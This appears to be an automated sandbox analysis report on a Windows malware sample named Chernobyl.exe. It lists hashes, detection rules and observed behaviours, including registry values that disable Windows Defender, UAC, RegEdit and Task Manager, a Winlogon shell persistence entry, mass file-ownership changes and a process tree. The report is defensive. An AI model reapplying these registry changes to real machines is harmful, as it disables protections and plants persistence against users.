Analysis
-
max time kernel
134s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-03-2024 01:22
Static task
static1
Behavioral task
behavioral1
Sample
Chernobyl.exe
Resource
win7-20240221-en
General
-
Target
Chernobyl.exe
-
Size
414KB
-
MD5
9fcd5730958fe25770695b809a353182
-
SHA1
645ee1c9459e1b5572e773fdcce99ce44ab7d540
-
SHA256
82f000040ba55e62efbf264a966a5e47bf92a23f0b52c214c1336d64103024ff
-
SHA512
3e07a63effed4b68a9e7bd7289cc3b37ee1fda924e91a76adf7101c18aa3b82e74edf248ec2c242f2496f83510fe0810aeeddbc2daec096d236d136711636ddc
-
SSDEEP
6144:c/bVZZo02222222222222222222222222222222222222222222222222222222T:jtH0GOZzv4TatsNqaJx
Malware Config
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral1/memory/1664-0-0x000000013FC30000-0x000000013FC9C000-memory.dmp disable_win_def behavioral1/memory/1664-2-0x000000001BD90000-0x000000001BE10000-memory.dmp disable_win_def -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Chernobyl.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Processes:
icacls.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exepid process 4028 icacls.exe 5008 icacls.exe 4532 takeown.exe 4532 2108 takeown.exe 3968 icacls.exe 3860 icacls.exe 4124 icacls.exe 4536 icacls.exe 4456 takeown.exe 3712 icacls.exe 4072 icacls.exe 4140 takeown.exe 4708 icacls.exe 5108 takeown.exe 3656 icacls.exe 4048 icacls.exe 3104 takeown.exe 3140 icacls.exe 4588 5712 2412 icacls.exe 3240 icacls.exe 3504 icacls.exe 3692 takeown.exe 3068 takeown.exe 1060 icacls.exe 752 takeown.exe 3496 icacls.exe 3692 icacls.exe 4208 icacls.exe 2376 icacls.exe 3100 takeown.exe 3632 takeown.exe 3860 takeown.exe 1324 takeown.exe 3120 takeown.exe 4064 takeown.exe 4980 icacls.exe 4708 280 icacls.exe 4056 takeown.exe 5048 takeown.exe 4072 icacls.exe 4632 takeown.exe 4176 icacls.exe 4144 icacls.exe 2328 icacls.exe 3140 icacls.exe 2472 takeown.exe 5692 1412 icacls.exe 3504 takeown.exe 4520 3600 icacls.exe 4192 icacls.exe 4500 takeown.exe 4796 takeown.exe 5212 2664 icacls.exe 2928 takeown.exe 4820 takeown.exe 3436 icacls.exe 4156 icacls.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exepid process 4480 icacls.exe 2664 icacls.exe 2928 icacls.exe 3604 icacls.exe 4632 takeown.exe 3160 icacls.exe 4804 icacls.exe 4088 icacls.exe 2128 takeown.exe 1192 icacls.exe 1088 icacls.exe 3656 takeown.exe 4956 icacls.exe 4396 752 takeown.exe 2472 icacls.exe 3624 icacls.exe 3860 icacls.exe 816 takeown.exe 3908 icacls.exe 1324 takeown.exe 4588 1972 takeown.exe 1088 takeown.exe 2168 takeown.exe 1324 takeown.exe 4980 icacls.exe 4588 3740 takeown.exe 4452 takeown.exe 4156 takeown.exe 4640 takeown.exe 5056 takeown.exe 3664 takeown.exe 3196 takeown.exe 4072 icacls.exe 4488 icacls.exe 4520 icacls.exe 4680 icacls.exe 4384 icacls.exe 5528 696 takeown.exe 2328 icacls.exe 3620 takeown.exe 3272 takeown.exe 4952 icacls.exe 3012 icacls.exe 816 takeown.exe 4140 takeown.exe 4360 takeown.exe 5048 takeown.exe 3604 takeown.exe 3852 takeown.exe 4456 icacls.exe 4948 icacls.exe 4124 icacls.exe 4812 icacls.exe 1128 takeown.exe 3616 takeown.exe 4796 takeown.exe 5060 icacls.exe 3308 takeown.exe 4640 takeown.exe 2416 takeown.exe -
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Processes:
Chernobyl.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" Chernobyl.exe -
Drops file in System32 directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File opened for modification C:\Windows\System32\kill.ico Chernobyl.exe File opened for modification C:\Windows\System32\wallpaper.jpg Chernobyl.exe -
Drops file in Windows directory 2 IoCs
Processes:
Chernobyl.exedescription ioc process File created C:\Windows\cluttscape.exe Chernobyl.exe File opened for modification C:\Windows\cluttscape.exe Chernobyl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies File Icons 3 IoCs
Processes:
Chernobyl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Modifies registry class 39 IoCs
Processes:
Chernobyl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} Chernobyl.exe Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" Chernobyl.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Chernobyl.exepid process 1664 Chernobyl.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Chernobyl.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 1664 Chernobyl.exe Token: SeDebugPrivilege 1664 Chernobyl.exe Token: SeTakeOwnershipPrivilege 1972 takeown.exe Token: SeTakeOwnershipPrivilege 900 takeown.exe Token: SeTakeOwnershipPrivilege 2496 takeown.exe Token: SeTakeOwnershipPrivilege 2028 takeown.exe Token: SeTakeOwnershipPrivilege 2508 takeown.exe Token: SeTakeOwnershipPrivilege 2128 takeown.exe Token: SeTakeOwnershipPrivilege 820 takeown.exe Token: SeTakeOwnershipPrivilege 2360 takeown.exe Token: SeTakeOwnershipPrivilege 2648 takeown.exe Token: SeTakeOwnershipPrivilege 1216 takeown.exe Token: SeTakeOwnershipPrivilege 1088 takeown.exe Token: SeTakeOwnershipPrivilege 2328 takeown.exe Token: SeTakeOwnershipPrivilege 1324 takeown.exe Token: SeTakeOwnershipPrivilege 3048 takeown.exe Token: SeTakeOwnershipPrivilege 1128 takeown.exe Token: SeTakeOwnershipPrivilege 2340 takeown.exe Token: SeTakeOwnershipPrivilege 2416 takeown.exe Token: SeTakeOwnershipPrivilege 1604 takeown.exe Token: SeTakeOwnershipPrivilege 2168 takeown.exe Token: SeTakeOwnershipPrivilege 2884 takeown.exe Token: SeTakeOwnershipPrivilege 1088 takeown.exe Token: SeTakeOwnershipPrivilege 816 takeown.exe Token: SeTakeOwnershipPrivilege 2168 takeown.exe Token: SeTakeOwnershipPrivilege 1704 takeown.exe Token: SeTakeOwnershipPrivilege 2416 takeown.exe Token: SeTakeOwnershipPrivilege 2180 takeown.exe Token: SeTakeOwnershipPrivilege 3120 takeown.exe Token: SeTakeOwnershipPrivilege 3128 takeown.exe Token: SeTakeOwnershipPrivilege 3172 takeown.exe Token: SeTakeOwnershipPrivilege 3336 takeown.exe Token: SeTakeOwnershipPrivilege 3404 takeown.exe Token: SeTakeOwnershipPrivilege 3592 takeown.exe Token: SeTakeOwnershipPrivilege 3924 takeown.exe Token: SeTakeOwnershipPrivilege 4008 takeown.exe Token: SeTakeOwnershipPrivilege 4092 takeown.exe Token: SeTakeOwnershipPrivilege 1088 takeown.exe Token: SeTakeOwnershipPrivilege 3308 takeown.exe Token: SeTakeOwnershipPrivilege 3396 takeown.exe Token: SeTakeOwnershipPrivilege 3284 takeown.exe Token: SeTakeOwnershipPrivilege 3484 takeown.exe Token: SeTakeOwnershipPrivilege 3544 takeown.exe Token: SeTakeOwnershipPrivilege 3556 takeown.exe Token: SeTakeOwnershipPrivilege 3664 takeown.exe Token: SeTakeOwnershipPrivilege 3852 takeown.exe Token: SeTakeOwnershipPrivilege 3912 takeown.exe Token: SeTakeOwnershipPrivilege 3748 takeown.exe Token: SeTakeOwnershipPrivilege 3984 takeown.exe Token: SeTakeOwnershipPrivilege 3876 takeown.exe Token: SeTakeOwnershipPrivilege 3920 takeown.exe Token: SeTakeOwnershipPrivilege 4024 takeown.exe Token: SeTakeOwnershipPrivilege 3196 takeown.exe Token: SeTakeOwnershipPrivilege 3540 takeown.exe Token: SeTakeOwnershipPrivilege 3268 takeown.exe Token: SeTakeOwnershipPrivilege 3656 takeown.exe Token: SeTakeOwnershipPrivilege 3628 takeown.exe Token: SeTakeOwnershipPrivilege 3948 takeown.exe Token: SeTakeOwnershipPrivilege 4032 takeown.exe Token: SeTakeOwnershipPrivilege 3632 takeown.exe Token: SeTakeOwnershipPrivilege 696 takeown.exe Token: SeTakeOwnershipPrivilege 4052 takeown.exe Token: SeTakeOwnershipPrivilege 4028 takeown.exe Token: SeTakeOwnershipPrivilege 3104 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Chernobyl.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1664 wrote to memory of 2680 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 2680 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 2680 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 3028 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 3028 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 3028 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1856 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1856 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1856 1664 Chernobyl.exe cmd.exe PID 2680 wrote to memory of 2040 2680 cmd.exe rundll32.exe PID 2680 wrote to memory of 2040 2680 cmd.exe rundll32.exe PID 2680 wrote to memory of 2040 2680 cmd.exe rundll32.exe PID 3028 wrote to memory of 1652 3028 cmd.exe rundll32.exe PID 3028 wrote to memory of 1652 3028 cmd.exe rundll32.exe PID 3028 wrote to memory of 1652 3028 cmd.exe rundll32.exe PID 1664 wrote to memory of 1080 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1080 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1080 1664 Chernobyl.exe cmd.exe PID 1856 wrote to memory of 1192 1856 cmd.exe rundll32.exe PID 1856 wrote to memory of 1192 1856 cmd.exe rundll32.exe PID 1856 wrote to memory of 1192 1856 cmd.exe rundll32.exe PID 1664 wrote to memory of 1196 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1196 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1196 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 2164 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 2164 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 2164 1664 Chernobyl.exe cmd.exe PID 1080 wrote to memory of 2016 1080 cmd.exe rundll32.exe PID 1080 wrote to memory of 2016 1080 cmd.exe rundll32.exe PID 1080 wrote to memory of 2016 1080 cmd.exe rundll32.exe PID 1196 wrote to memory of 1968 1196 cmd.exe rundll32.exe PID 1196 wrote to memory of 1968 1196 cmd.exe rundll32.exe PID 1196 wrote to memory of 1968 1196 cmd.exe rundll32.exe PID 2164 wrote to memory of 928 2164 cmd.exe rundll32.exe PID 2164 wrote to memory of 928 2164 cmd.exe rundll32.exe PID 2164 wrote to memory of 928 2164 cmd.exe rundll32.exe PID 1664 wrote to memory of 1820 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1820 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1820 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1092 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1092 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1092 1664 Chernobyl.exe cmd.exe PID 1820 wrote to memory of 936 1820 cmd.exe rundll32.exe PID 1820 wrote to memory of 936 1820 cmd.exe rundll32.exe PID 1820 wrote to memory of 936 1820 cmd.exe rundll32.exe PID 1664 wrote to memory of 804 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 804 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 804 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1680 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1680 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1680 1664 Chernobyl.exe cmd.exe PID 1092 wrote to memory of 1704 1092 cmd.exe rundll32.exe PID 1092 wrote to memory of 1704 1092 cmd.exe rundll32.exe PID 1092 wrote to memory of 1704 1092 cmd.exe rundll32.exe PID 804 wrote to memory of 1344 804 cmd.exe rundll32.exe PID 804 wrote to memory of 1344 804 cmd.exe rundll32.exe PID 804 wrote to memory of 1344 804 cmd.exe rundll32.exe PID 1664 wrote to memory of 1204 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1204 1664 Chernobyl.exe cmd.exe PID 1664 wrote to memory of 1204 1664 Chernobyl.exe cmd.exe PID 1680 wrote to memory of 2144 1680 cmd.exe rundll32.exe PID 1680 wrote to memory of 2144 1680 cmd.exe rundll32.exe PID 1680 wrote to memory of 2144 1680 cmd.exe rundll32.exe PID 1664 wrote to memory of 2736 1664 Chernobyl.exe cmd.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
Chernobyl.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" Chernobyl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Chernobyl.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Modifies system executable filetype association
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies File Icons
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1664 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1204
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2736
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:664
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2864
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2932
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:436
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:940
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1548
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1988
-
-
-
